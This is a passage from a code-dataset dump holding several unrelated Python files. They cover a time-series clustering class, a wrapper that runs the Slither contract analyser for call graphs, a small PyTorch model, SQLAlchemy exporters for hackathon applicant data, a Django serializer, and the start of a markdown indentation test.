"mybacktest.py", "file_ext": "py", "file_size_in_byte": 9532, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 13, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 42, "usage_type": "attribute"}, {"api_name": "backtrader.Strategy", "line_number": 50, "usage_type": "attribute"}, {"api_name": "backtrader.num2date", "line_number": 61, "usage_type": "call"}, {"api_name": "backtrader.indicators.SimpleMovingAverage", "line_number": 80, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 138, "usage_type": "call"}, {"api_name": "backtrader.Cerebro", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 203, "usage_type": 
"name"}, {"api_name": "os.path.path.abspath", "line_number": 203, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 204, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 204, "usage_type": "name"}, {"api_name": "backtrader.feeds.GenericCSVData", "line_number": 206, "usage_type": "call"}, {"api_name": "backtrader.feeds", "line_number": 206, "usage_type": "attribute"}, {"api_name": "backtrader.TimeFrame", "line_number": 217, "usage_type": "attribute"}, {"api_name": "backtrader.observers", "line_number": 223, "usage_type": "attribute"}, {"api_name": "backtrader.TimeFrame", "line_number": 224, "usage_type": "attribute"}, {"api_name": "backtrader.analyzers", "line_number": 226, "usage_type": "attribute"}, {"api_name": "backtrader.analyzers", "line_number": 228, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 268, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 269, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 270, "usage_type": "attribute"}]}
+{"seq_id": "27380021021", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 1 22:14:30 2020\n\n@author: vito\n\"\"\"\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom Solver.TGMRF_solver import TGMRF_solver\nfrom time import time\nimport os\nimport pickle as pkl\n\nclass TGMRF:\n \"\"\"\n The implementation is Time-varying Gaussian Markov Random Feilds based clustering algorithm\n \n Parameters\n ----------\n \"\"\"\n def __init__(self, epsilon=50, width=10, stride=1, maxIters=30, lr=0, lamb=1e-2, beta=1e-2, measure=\"euclidean\", verbose=True, verbose_ADMM=False,dimension_reduce=True,dataset_name=\"Test\",use_dump=False,maxIters_ADMM=1000):\n self.epsilon = epsilon\n self.width = width\n self.stride = stride\n self.measure = measure\n self.maxIters = maxIters\n self.lr =lr\n self.lamb = lamb\n self.beta = beta\n self.verbose = verbose\n self.project_matrix = None\n self.initilizing = False\n self.verbose_ADMM = verbose_ADMM\n self.dimension_reduce = dimension_reduce\n self.dataset_name = dataset_name\n self.use_dump = use_dump\n self.maxIters_ADMM = maxIters_ADMM\n \n def triangle_l_2_matrix_l(self, l):\n n = int((-1 + np.sqrt(1+ 8*l))/2)\n return n\n \n def upper2Full(self, a):\n n = self.triangle_l_2_matrix_l(a.shape[0])\n A = np.zeros([n,n])\n A[np.triu_indices(n)] = a\n temp = A.diagonal()\n A = (A + A.T) - np.diag(temp)\n return A\n \n def predict(self, X):\n \"\"\"\n Fix the model and construct the project matrix\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n C_trans : array, shape [n_samples, k]\n Compacted vectors of T-GMRF after PCA\n \"\"\"\n if not type(self.project_matrix) is np.ndarray:\n raise RuntimeError('Please fitting the model beforehand!')\n\n # Compute Time-varying Gaussian Markov Random Fields for every MTS (multivariaten time series) \n n_samples = X.shape[0]\n m_lengths = X.shape[2]\n l_features = X.shape[1]\n s_windows = int((m_lengths - self.width) / self.stride + 1)\n self.C = np.zeros((int(l_features * (l_features + 1) * s_windows / 2), n_samples))\n cov_matrix_len = int(l_features * (l_features + 1) / 2)\n\n clf = TGMRF_solver(width=self.width, stride=self.stride, \n maxIters=self.maxIters, lr=self.lr, lamb=self.lamb, beta=self.beta, initilizing=self.initilizing, verbose_ADMM=self.verbose_ADMM,maxIters_ADMM=self.maxIters_ADMM)\n \n aggregated_ll_Loss = 0\n aggregated_penalty_loss = 0\n\n for i in tqdm(range(n_samples), ascii=True, desc=\"TGMRF\"):\n ics, loss, ll_loss, penalty_loss, numberOfParameters = clf.fit(X[i].T)\n aggregated_ll_Loss += ll_loss\n aggregated_penalty_loss += penalty_loss\n for j in range(s_windows):\n self.C[j * cov_matrix_len: (j + 1) * cov_matrix_len, i] = ics[j]\n\n C_normalize = preprocessing.normalize(self.C, norm='l2')\n\n # Projecting the features\n C_trans = np.dot(C_normalize.T, self.project_matrix)\n\n return C_trans\n \n def fit_transform(self, X):\n \"\"\"\n Transform X todistance matrix.\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n distance : array, shape [n_samples, n_samples]\n similarity distance matrix.\n ...\n Other useful data structure.\n \"\"\"\n # Compute Time-varying Gaussian Markov Random Fields for every MTS (multivariaten time series) \n n_samples = X.shape[0]\n l_features = X.shape[1]\n 
m_lengths = X.shape[2]\n s_windows = int((m_lengths - self.width) / self.stride + 1)\n self.C = np.zeros((int(l_features * (l_features + 1) * s_windows / 2), n_samples))\n cov_matrix_len = int(l_features * (l_features + 1) / 2)\n\n duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters = 0, 0, 0, 0\n\n start = time()\n\n dump_file = f\"./dump/{self.dataset_name}/T_GMRF_{self.dataset_name}_dump.pkl\"\n\n if not os.path.exists(dump_file) or not self.use_dump:\n\n if self.dataset_name in ['EEG', \"DuckDuckGeese\", \"FingerMovements\"]:\n initilizing = True\n else:\n initilizing = False\n\n clf = TGMRF_solver(width=self.width, stride=self.stride, \n maxIters=self.maxIters, lr=self.lr, lamb=self.lamb, beta=self.beta, verbose_ADMM=self.verbose_ADMM,initilizing=initilizing)\n \n aggregated_ll_Loss = 0\n aggregated_penalty_loss = 0\n\n for i in tqdm(range(n_samples), ascii=True, desc=\"TGMRF\"):\n ics, loss, ll_loss, penalty_loss, numberOfParameters = clf.fit(X[i].T)\n aggregated_ll_Loss += ll_loss\n aggregated_penalty_loss += penalty_loss\n for j in range(s_windows):\n self.C[j * cov_matrix_len: (j + 1) * cov_matrix_len, i] = ics[j]\n \n if self.use_dump:\n output = open(dump_file, 'wb')\n pkl.dump(self.C, output)\n else:\n output = open(dump_file, 'rb')\n self.C = pkl.load(output)\n \n duration = time() - start\n \n # normalizing C\n \"\"\"\n # worsen performance for z-normalize\n # the l2-norm normalization is applied\n quantile_transformer = preprocessing.QuantileTransformer(\n output_distribution='normal', random_state=0)\n C = quantile_transformer.fit_transform(C)\n \"\"\"\n\n C_normalize = preprocessing.normalize(self.C, norm='l2')\n # keep original feature\n # C_normalize = self.C\n \n if self.dimension_reduce:\n \n try:\n reduce_dump = f\"./dump/{self.dataset_name}/Reduce_{self.dataset_name}_dump.pkl\"\n use_reduce_dump = False\n if not os.path.exists(reduce_dump) or not use_reduce_dump:\n\n # Covariance of C\n Sigma_c = np.cov(C_normalize)\n \n # Run SVD algorithm onto covariance matrix of C\n u, s, vh = np.linalg.svd(Sigma_c, full_matrices=True)\n\n if use_reduce_dump:\n reduce = open(reduce_dump, 'wb')\n pkl.dump((Sigma_c, u, s, vh), reduce)\n else:\n reduce = open(reduce_dump, 'rb')\n Sigma_c, u, s, vh = pkl.load(reduce)\n \n # According to the energy content threshold, select the first k eigenvectors\n totally_variance = sum(s)\n k = len(s)\n for i in range(len(s), 0, -1):\n if sum(s[:i])/totally_variance*100 < self.epsilon:\n k = i + 1\n break\n \n # Projecting the features\n C_trans = np.dot(C_normalize.T, u[:, :k])\n\n # dump the projecting matrix\n self.project_matrix = u[:, :k]\n except:\n pca = PCA(n_components=8) # DuckDuckGeese:8\n C_trans = pca.fit_transform(C_normalize.T)\n else:\n C_trans = C_normalize.T\n \n return C_trans, duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters\n\n def fit(self, X_train, X_test):\n \"\"\"\n Fit the model on the concatenated train and test data and construct the projection matrix\n \n Parameters\n ----------\n X_train, X_test : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n Data to fit on and transform.\n \n Returns\n -------\n C_trans, C_trans_train, C_trans_test : arrays\n Transformed feature vectors for all samples, the training split and the test split.\n \"\"\"\n\n X = np.concatenate((X_train, X_test), axis=0)\n\n C_trans, duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters = self.fit_transform(X)\n \n C_trans_train = C_trans[:X_train.shape[0]]\n\n C_trans_test = C_trans[-X_test.shape[0]:]\n\n return C_trans, C_trans_train, C_trans_test", "repo_name": "Vitoom/T-GMRF", "sub_path": "TGMRF.py", "file_name": "TGMRF.py", "file_ext": "py", 
"file_size_in_byte": 8544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sqrt", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.triu_indices", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "Solver.TGMRF_solver.TGMRF_solver", "line_number": 79, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 85, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 92, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 120, "usage_type": "call"}, {"api_name": "time.time", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "Solver.TGMRF_solver.TGMRF_solver", "line_number": 136, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 142, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 151, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 154, "usage_type": "call"}, {"api_name": "time.time", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 167, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.cov", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.linalg.svd", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 186, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 226, "usage_type": "call"}]}
+{"seq_id": "71764659047", "text": "import subprocess # library used to interact with command line\nimport os\nimport re\nfrom graphviz import Source\n\n# slither proxy class for grnrrating the call graph\nclass SlitherProxy:\n def __init__(self):\n self.current_dir = os.getcwd()\n self.output_folder = self.current_dir\n\n def genCallGraph(self, contractName):\n try:\n subprocess.run(['slither', contractName, '--print', 'call-graph'])\n call_graph_filename = f'{contractName}.all_contracts.call-graph.dot'\n call_graph_path = os.path.join(self.output_folder, call_graph_filename)\n\n if os.path.exists(call_graph_path):\n call_graph_png_path = os.path.join(self.output_folder, f'{contractName}.all_contracts.call-graph.dot.png')\n graph_source = Source.from_file(call_graph_path, format=\"png\")\n graph_source.render(view=False) # Optional: Open the PNG file after rendering\n print(f\"Call Graph saved to: {call_graph_path}\")\n return call_graph_png_path\n else:\n print(\"Error: Call graph file not created.\")\n except subprocess.CalledProcessError as e:\n print(f\"Error executing Slither: {e}\")\n #def highlightCallGraph(self, contractName):\n def genListOf_VarFun(self, contractName, output_file='output.txt'):\n # command to generate list of state variables and functions\n subprocess.run(['slither', contractName, '--print', 'vars-and-auth'])\n with open(output_file, 'w') as output_file:\n result = subprocess.run(['slither', contractName, '--print', 'vars-and-auth'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n cleaned_output = re.sub(r'\\x1b\\[[0-9;]*[mK]', '', result.stdout + result.stderr) # Remove ANSI escape codes\n output_file.write(cleaned_output)\n def get_state_variables(self, output_file_path):\n # Read the content of the output.txt file\n with open(output_file_path, 'r') as file:\n output_content = file.read()\n\n # Find all matches for state variables\n state_variables_matches = re.findall(r'\\|\\s+(\\w+)\\s+\\|\\s+\\[([^]]*)\\]\\s+\\|', output_content)\n\n # Extract state variables excluding those starting with '_'\n state_variables = [var.strip(\"'\") for function, variables in state_variables_matches for var in variables.split(', ') if not var.strip(\"'\").startswith('_')]\n\n # Remove duplicates\n state_variables = list(set(state_variables))\n\n return state_variables\n\n# Example usage:\n# result = subprocess.run(['slither', contractPath, '--print', 'vars-and-auth']\n # , shell=True, capture_output=True)\n # # Access the output\n # output = result.stdout\n # return output\n\n\n\n\n", "repo_name": "zainab-yousaf/FYP-Fuzzing", "sub_path": "slither.py", "file_name": "slither.py", "file_ext": "py", "file_size_in_byte": 2788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getcwd", "line_number": 9, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "graphviz.Source.from_file", "line_number": 20, "usage_type": "call"}, {"api_name": "graphviz.Source", "line_number": 20, "usage_type": "name"}, {"api_name": 
"subprocess.CalledProcessError", "line_number": 26, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 31, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 33, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 34, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "34460881121", "text": "import torch\n\nfrom music_genre_classification.models.classification_model import (\n TorchMertClassIncrementalModel,\n)\n\n\nclass TorchL2PClassIncrementalModel(TorchMertClassIncrementalModel):\n def forward(self, inputs: torch.Tensor):\n outputs, key_loss = self.encoder(inputs)\n outputs = self.decoder(outputs)\n return outputs, key_loss\n", "repo_name": "pedrocg42/music-genre-classification", "sub_path": "music_genre_classification/models/torch_l2p_class_incremental_model.py", "file_name": "torch_l2p_class_incremental_model.py", "file_ext": "py", "file_size_in_byte": 359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "music_genre_classification.models.classification_model.TorchMertClassIncrementalModel", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 9, "usage_type": "attribute"}]}
+{"seq_id": "19629383239", "text": "from sqlalchemy import Integer, cast, extract, func\nfrom sqlalchemy.future import select\n\nfrom common.database import Application, ApplicationStatus, Participant, School\n\nfrom .base import Exporter\n\n\nclass MLHRegistered(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Age\",\n \"Email\",\n \"School\",\n \"Phone number\",\n \"Country\",\n \"Level of study\",\n \"Acknowledged checkboxes\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Participant.email,\n School.name,\n Application.phone_number,\n Application.country,\n Application.level_of_study,\n Application.legal_agreements_acknowledged,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n )\n\n\nclass ResumeBook(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Email\",\n \"Age\",\n \"Country\",\n \"School\",\n \"Major\",\n \"Level of study\",\n \"Graduation year\",\n \"Portfolio URL\",\n \"VCS URL\",\n \"Has Resume?\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n Participant.email,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Application.country,\n School.name,\n Application.major,\n Application.level_of_study,\n Application.graduation_year,\n Application.portfolio_url,\n Application.vcs_url,\n Application.resume != None,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n .where(Application.status == ApplicationStatus.ACCEPTED)\n .where(Application.share_information)\n )\n\n\nclass All(Exporter):\n header = [\n \"First name\",\n \"Last name\",\n \"Email\",\n \"Phone Number\",\n \"Age\",\n \"Gender\",\n \"Race / Ethnicity\",\n \"Country\",\n \"School\",\n \"Major\",\n \"Level of Study\",\n \"Graduation Year\",\n \"Hackathons Attended\",\n \"Portfolio URL\",\n \"VCS URL\",\n \"Share Information?\",\n \"Checked-in?\",\n \"Status\",\n ]\n statement = (\n select(\n Participant.first_name,\n Participant.last_name,\n Participant.email,\n Application.phone_number,\n cast(extract(\"year\", func.age(Application.date_of_birth)), Integer),\n Application.gender,\n Application.race_ethnicity,\n Application.country,\n School.name,\n Application.major,\n Application.level_of_study,\n Application.graduation_year,\n Application.hackathons_attended,\n Application.portfolio_url,\n Application.vcs_url,\n Application.share_information,\n Participant.checked_in,\n Application.status,\n )\n .join_from(Application, Participant)\n .join_from(Application, School)\n )\n", "repo_name": "WaffleHacks/application-portal", "sub_path": "tasks/handlers/integration/export/applications.py", "file_name": "applications.py", "file_ext": "py", "file_size_in_byte": 3237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.Exporter", "line_number": 9, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 34, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 34, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 33, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 33, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 22, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 23, "usage_type": 
"attribute"}, {"api_name": "common.database.Participant", "line_number": 23, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 24, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 25, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 25, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 25, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 26, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 26, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 27, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 27, "usage_type": "name"}, {"api_name": "common.database.Application.phone_number", "line_number": 28, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 28, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 29, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 29, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 30, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 30, "usage_type": "name"}, {"api_name": "common.database.Application.legal_agreements_acknowledged", "line_number": 31, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 31, "usage_type": "name"}, {"api_name": "base.Exporter", "line_number": 38, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 69, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 69, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 68, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 54, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 55, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 55, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 56, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 56, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 57, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 58, "usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 58, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 58, "usage_type": "attribute"}, 
{"api_name": "common.database.Application", "line_number": 58, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 59, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 59, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 60, "usage_type": "name"}, {"api_name": "common.database.Application.major", "line_number": 61, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 61, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 62, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 62, "usage_type": "name"}, {"api_name": "common.database.Application.graduation_year", "line_number": 63, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 63, "usage_type": "name"}, {"api_name": "common.database.Application.portfolio_url", "line_number": 64, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 64, "usage_type": "name"}, {"api_name": "common.database.Application.vcs_url", "line_number": 65, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 65, "usage_type": "name"}, {"api_name": "common.database.Application.resume", "line_number": 66, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 66, "usage_type": "name"}, {"api_name": "common.database.Application.status", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 70, "usage_type": "name"}, {"api_name": "common.database.ApplicationStatus.ACCEPTED", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.database.ApplicationStatus", "line_number": 70, "usage_type": "name"}, {"api_name": "common.database.Application.share_information", "line_number": 71, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 71, "usage_type": "name"}, {"api_name": "base.Exporter", "line_number": 75, "usage_type": "name"}, {"api_name": "common.database.Application", "line_number": 118, "usage_type": "argument"}, {"api_name": "common.database.School", "line_number": 118, "usage_type": "argument"}, {"api_name": "common.database.Application", "line_number": 117, "usage_type": "argument"}, {"api_name": "common.database.Participant", "line_number": 117, "usage_type": "argument"}, {"api_name": "sqlalchemy.future.select", "line_number": 97, "usage_type": "call"}, {"api_name": "common.database.Participant.first_name", "line_number": 98, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 98, "usage_type": "name"}, {"api_name": "common.database.Participant.last_name", "line_number": 99, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 99, "usage_type": "name"}, {"api_name": "common.database.Participant.email", "line_number": 100, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 100, "usage_type": "name"}, {"api_name": "common.database.Application.phone_number", "line_number": 101, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 101, "usage_type": "name"}, {"api_name": "sqlalchemy.cast", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 102, 
"usage_type": "argument"}, {"api_name": "sqlalchemy.extract", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.func.age", "line_number": 102, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 102, "usage_type": "name"}, {"api_name": "common.database.Application.date_of_birth", "line_number": 102, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 102, "usage_type": "name"}, {"api_name": "common.database.Application.gender", "line_number": 103, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 103, "usage_type": "name"}, {"api_name": "common.database.Application.race_ethnicity", "line_number": 104, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 104, "usage_type": "name"}, {"api_name": "common.database.Application.country", "line_number": 105, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 105, "usage_type": "name"}, {"api_name": "common.database.School.name", "line_number": 106, "usage_type": "attribute"}, {"api_name": "common.database.School", "line_number": 106, "usage_type": "name"}, {"api_name": "common.database.Application.major", "line_number": 107, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 107, "usage_type": "name"}, {"api_name": "common.database.Application.level_of_study", "line_number": 108, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 108, "usage_type": "name"}, {"api_name": "common.database.Application.graduation_year", "line_number": 109, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 109, "usage_type": "name"}, {"api_name": "common.database.Application.hackathons_attended", "line_number": 110, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 110, "usage_type": "name"}, {"api_name": "common.database.Application.portfolio_url", "line_number": 111, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 111, "usage_type": "name"}, {"api_name": "common.database.Application.vcs_url", "line_number": 112, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 112, "usage_type": "name"}, {"api_name": "common.database.Application.share_information", "line_number": 113, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 113, "usage_type": "name"}, {"api_name": "common.database.Participant.checked_in", "line_number": 114, "usage_type": "attribute"}, {"api_name": "common.database.Participant", "line_number": 114, "usage_type": "name"}, {"api_name": "common.database.Application.status", "line_number": 115, "usage_type": "attribute"}, {"api_name": "common.database.Application", "line_number": 115, "usage_type": "name"}]}
+{"seq_id": "75041765927", "text": "from rest_framework import serializers\r\nfrom nt_resource.models import CatNormalResource\r\nfrom nt_core.utils import get_current_timestamp\r\n\r\n\r\nclass CatNormalResourceListSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = CatNormalResource\r\n fields = '__all__'\r\n\r\n def update(self, instance, validated_data):\r\n instance.appid = validated_data.get('appid', instance.appid)\r\n instance.response_time = validated_data.get(\r\n 'response_time', instance.response_time\r\n )\r\n\r\n instance.update_time = get_current_timestamp()\r\n instance.save()\r\n return instance\r\n", "repo_name": "harvardfly/network_anomaly_detection", "sub_path": "nt_resource/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": "name"}, {"api_name": "nt_resource.models.CatNormalResource", "line_number": 8, "usage_type": "name"}, {"api_name": "nt_core.utils.get_current_timestamp", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "44294345628", "text": "\"\"\"\nTest suite to check if the indentation of the .md is mostly correct.\n\"\"\"\nimport glob\nimport os\nimport unittest\n\nimport mkdocs.utils.meta\n\nfrom tests.path_constants import DOCS_DIR\n\n\nclass IndentationTest(unittest.TestCase):\n \"\"\"\n Indentation TestCase Class\n \"\"\"\n\n admonition_prefixes = (\"!!!\", \"???\", \"===\")\n list_prefixes = (\"-\", \"+\", \"*\")\n codeblock_prefix = \"```\"\n\n def test_admonitions_and_lists(self) -> None:\n \"\"\"\n Test that the indentation of admonitions and lists is correct\n \"\"\"\n paths = glob.glob(\"**/*.md\", root_dir=DOCS_DIR, recursive=True)\n for path in paths:\n file_path = os.path.join(DOCS_DIR, path)\n\n with open(file_path, encoding=\"utf-8-sig\") as file:\n source = file.read()\n\n contents, meta = mkdocs.utils.meta.get_data(source)\n\n last_line = \"\"\n inside_admonition = False\n admonition_valid = False\n inside_codeblock = False\n inside_list = False\n\n for n, line in enumerate(contents.split(\"\\n\"), start=1):\n if inside_admonition and admonition_valid:\n if line.lstrip(\" \") == line:\n inside_admonition = False\n\n if inside_admonition and line.strip():\n self.assertTrue(\n len(line) - len(line.lstrip(\" \")) >= 4,\n f\"The admonition content has to start with 4 or more 